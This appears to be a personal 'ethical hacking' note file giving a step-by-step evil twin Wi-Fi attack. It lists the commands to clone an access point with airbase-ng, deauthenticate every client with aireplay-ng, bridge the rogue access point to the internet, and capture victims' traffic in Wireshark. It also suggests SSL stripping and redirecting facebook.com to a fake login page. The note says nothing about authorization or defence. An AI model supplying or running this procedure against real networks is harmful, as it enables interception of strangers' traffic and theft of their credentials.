PenTesting / Ethical Hacking Notes: 

- TOPIC: Evil Twin: 
This is a way to have people auth to your machine, and inspect traffic.
This is also a way to serve content to people. For example redirect facebook.com to another IP with a fake facebook page. 

1. scan the location using monitor mode
"ifconfig wifi_card down"
"iwconfig wifi_card monitor"
"airmon-ng check wifi_card"

from here you will need to kill all the clients that are running. Remember this from the Wireless Hacking notes: 
- airmon-ng check name_of_wifi_card
IN ORDER
- "kill process_number" kill the NETWORK MANAGER if up 
- "kill process_number" kill the DHCLIENT if up
- "kill process_number" kill the WPA_SUPPLICANT if up
Kill the rest in any order you fancy.
check one more time

2. now scan: 
"airodump-ng wifi_card"

Authenticated clients will be listed at the bottom

3. next take the MAC address of the access point and run: 
"airbase-ng -a MAC ADDRESS --essid NAME OF ACCESS POINT -c ACCESS POINT CHANNEL wifi_card"
your fake access point should now be running.

4. now deauthenticate all users:
"aireplay-ng -0 0 -a MAC ADDRESS IF ACCESS POINT wifi_card"
also look into --deauth in the help

5. now look back at the clone log and see if anyone reauthenticated with you.

6. you need to create a bridge on your machine for the client to connected to the internet. 
install bridge utils: 
"apt-get install bridge-utils -y"

run the following commands: 
"brctl addbr evil" - this will add a fake device, note that the name "evil" can be anything you want.
"brctl addif evil eth0" - this will associate your network interface with the face device
"brctl addif evil at0" - this will associated the fake device with the interfact for your fake access point
### bring the devices up ###
"ifconfig at0 0.0.0.0 up" 
"ifconfig evil up" - this will bring up the fake device
"dhclient evil"

7. now the client that is connected to your access point they will have internet access. 

8. Now you can monitor traffic: Look into SSL strip here as well.
use wireshark for this: 
"apt-get install wireshark"

launch wireshark and select your fake device: 
double click on an entry in the list and look at the query information, from there you can see the requested URL



